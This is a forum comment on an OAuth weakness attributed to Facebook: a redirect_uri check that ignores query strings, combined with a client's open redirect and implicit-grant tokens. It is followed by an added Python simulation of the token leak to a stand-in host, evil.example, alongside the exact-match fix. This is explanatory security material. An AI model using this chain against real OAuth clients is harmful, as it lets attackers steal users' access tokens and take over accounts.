Basically the vulnerability is on the Facebook side. Every OAuth provider has a list of "allowed redirect URIs"; a good OAuth provider will check the entire URL, but Facebook doesn't check the query string in the URL. If you have a list of allowed redirects like:<p>- <a href="http://foo.com" rel="nofollow">http://foo.com</a>
- <a href="http://foo.com/foo" rel="nofollow">http://foo.com/foo</a><p>Facebook accepts redirects like:
- <a href="http://foo.com?anything_here=xx" rel="nofollow">http://foo.com?anything_here=xx</a><p>And if the client has an open redirect (some query-string parameter that redirects anywhere) combined with response_type=token, the evil website can get the token.
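To make the chain described in the comment concrete, here is an added example (my own toy code, not the commenter's and not Facebook's implementation). It models a provider-side redirect_uri check in the lax form the comment describes (scheme, host and path compared, query string ignored) next to the exact string match RFC 6749 section 3.1.2.3 requires for fully registered URIs, then simulates the implicit-flow redirect and a client-side open redirect. The client host foo.com comes from the comment; the `?next=` parameter, the attacker host evil.example and the token value are constructed assumptions.

```python
"""Toy OAuth redirect_uri validation and an open-redirect token leak.

Added example, not code from the original comment or from any real provider.
Hypothetical: the client's open-redirect parameter (?next=), the attacker's
collection URL (evil.example) and the token value.
"""
from urllib.parse import parse_qs, urlencode, urlsplit

# Redirect URIs registered by the client, as in the comment.
REGISTERED = ["http://foo.com", "http://foo.com/foo"]


def lax_match(redirect_uri, registered=REGISTERED):
    """Weak check: compare scheme, host and path only; the query string is ignored.
    This is the behaviour the comment attributes to Facebook."""
    r = urlsplit(redirect_uri)
    for allowed in registered:
        a = urlsplit(allowed)
        if (r.scheme, r.netloc, r.path or "/") == (a.scheme, a.netloc, a.path or "/"):
            return True
    return False


def strict_match(redirect_uri, registered=REGISTERED):
    """Correct check for fully registered URIs: simple string comparison
    (RFC 6749 section 3.1.2.3), so any added query string is rejected."""
    return redirect_uri in registered


def authorize(redirect_uri, token, matcher):
    """Toy authorization endpoint for response_type=token.

    Returns the Location the user agent is sent to, with the token in the URL
    fragment as the implicit grant does, or None if `matcher` rejects the URI."""
    if not matcher(redirect_uri):
        return None
    return f"{redirect_uri}#access_token={token}&token_type=bearer"


def client_open_redirect(url):
    """Toy endpoint on foo.com with an open redirect: ?next=<url> answers 302 to <url>.

    Browsers carry the fragment of the current URL over to the redirect target
    when the Location header carries no fragment of its own, so the token in
    #access_token=... travels to wherever `next` points."""
    parts = urlsplit(url)
    next_url = parse_qs(parts.query).get("next", [None])[0]
    if next_url is None:
        return url  # no redirect parameter, the page renders normally
    return next_url + ("#" + parts.fragment if parts.fragment else "")


def steal_token(matcher, token="tok_constructed_123"):
    """Attacker flow: build a redirect_uri that survives the provider's check but
    points at the client's open redirect. Returns the URL the victim's browser
    finally lands on, or None if the provider rejected the redirect_uri."""
    attacker_uri = "http://foo.com?" + urlencode({"next": "https://evil.example/collect"})
    location = authorize(attacker_uri, token, matcher)
    if location is None:
        return None
    return client_open_redirect(location)


if __name__ == "__main__":
    print("lax provider  :", steal_token(lax_match))
    print("strict provider:", steal_token(strict_match))
```

With the lax matcher the victim ends up on `https://evil.example/collect#access_token=...`, i.e. the attacker's page receives the bearer token in `location.hash`; with exact matching the authorization request is refused before any redirect happens. Note that the open redirect alone is harmless to the OAuth flow and the lax matching alone is harmless without a redirect on the client; the comment's point is that the two combine.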